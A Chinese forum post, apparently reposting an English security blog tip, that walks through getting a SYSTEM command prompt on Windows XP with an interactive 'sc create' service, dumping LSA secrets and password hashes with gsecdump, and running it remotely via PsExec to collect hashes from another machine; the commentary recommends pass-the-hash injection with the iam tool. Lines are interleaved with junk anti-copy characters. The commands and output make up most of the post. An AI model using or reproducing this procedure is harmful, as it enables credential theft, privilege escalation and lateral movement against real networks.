o get a DOS Prompt as NT system:4 W, S/ u$ ~7 d/ p" Z# [* c
% H: m! _3 Y, T# e- N# }! LC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
, C3 m5 c' Q% `% _+ P# Y2 l2 R1 ?[SC] CreateService SUCCESS
# h9 I% V2 Z$ J* H6 x0 A( x5 Z- |. K/ p8 F% c; Q( B
C:\>sc start shellcmdline, N1 _$ ?2 ]/ C1 u& J
[SC] StartService FAILED 1053:, Q) E0 K! }( p3 h
' g2 n' x: h, }$ E* w6 y
The service did not respond to the start or control request in a timely fashion.) Z! I5 x# x g7 K
4 m K, L/ n- [C:\>sc delete shellcmdline) I% w. K' e- J$ L5 [; N* w8 C
[SC] DeleteService SUCCESS P. p# _) E9 W( m/ L
# s. U0 g" [) e: K
------------! p u+ t3 N0 p, u
& [0 u# U D" E* l0 H* W- H& jThen in the new DOS window:2 M/ ?' t0 ?0 F5 e+ Q
3 F% }: B" d O w D5 U* Y/ C
Microsoft Windows XP [Version 5.1.2600]
, B9 S. B6 F. D# ?* X& G(C) Copyright 1985-2001 Microsoft Corp.
3 @& Y9 z( d8 v3 o9 M7 \% B8 H7 @: v+ J. y3 H
C:\WINDOWS\system32>whoami7 p9 Q" [1 U3 |. S. Z$ q# {
NT AUTHORITY\SYSTEM4 B! P$ R# Y3 \0 u6 y; d1 Z# t
4 S. ]4 \$ z# p; T
C:\WINDOWS\system32>gsecdump -h" {% c& P/ H' q" H& m* R
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
6 r. k! M0 _& E% fusage: gsecdump [options]
2 G5 o! B. B# n2 m0 L1 l& o% E7 G5 W8 G6 {8 L. S" z& }
options:
% D$ E2 s9 g$ t' O9 r3 n1 j% P-h [ --help ] show help: \9 ] V( ~" b
-a [ --dump_all ] dump all secrets2 B0 k3 Z6 u" \5 k( x
-l [ --dump_lsa ] dump lsa secrets
7 d: R- U9 }, m-w [ --dump_wireless ] dump microsoft wireless connections
1 Z" u& R% n$ H1 }1 R. d. G-u [ --dump_usedhashes ] dump hashes from active logon sessions
( C4 Q6 P# u, K( l$ U-s [ --dump_hashes ] dump hashes from SAM/AD
Q/ u. _, a& A* i
: F5 T0 t4 N2 }: bAlthough I like to use:
& }* o. a, v) _/ Z; W: b' V/ Q' e& H, }$ Q9 @! [0 t% g
PsExec v1.83 - Execute processes remotely
- f0 U) [8 w9 Y$ V" t( [! B6 A! [Copyright (C) 2001-2007 Mark Russinovich1 M' k: N: D% [: t
Sysinternals - 链接标记[url]www.sysinternals.com[/url]: Q3 e' [. j1 k' h' r
- D) ~6 e9 a9 D' eC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT9 N) T. d$ R8 Y
, z |& ~; O5 e4 Uto get the hashes from active logon sessions of a remote system.
5 t# L+ e* Q6 H. u8 j0 D( }, `( _9 b% k
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.; ~1 z- `" e& q
@9 X4 R' m0 V( a, m提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
, Z+ A f3 `( f, v' h+ B& C原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]: w3 v+ A* p7 a& o/ f# m) r2 i% C
" Y, j8 e2 C5 n0 D7 `& [- y我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
' @" g$ \% ^/ Q s a. p6 s |
发表于 2012-11-6 21:09:29
收藏
支持
反对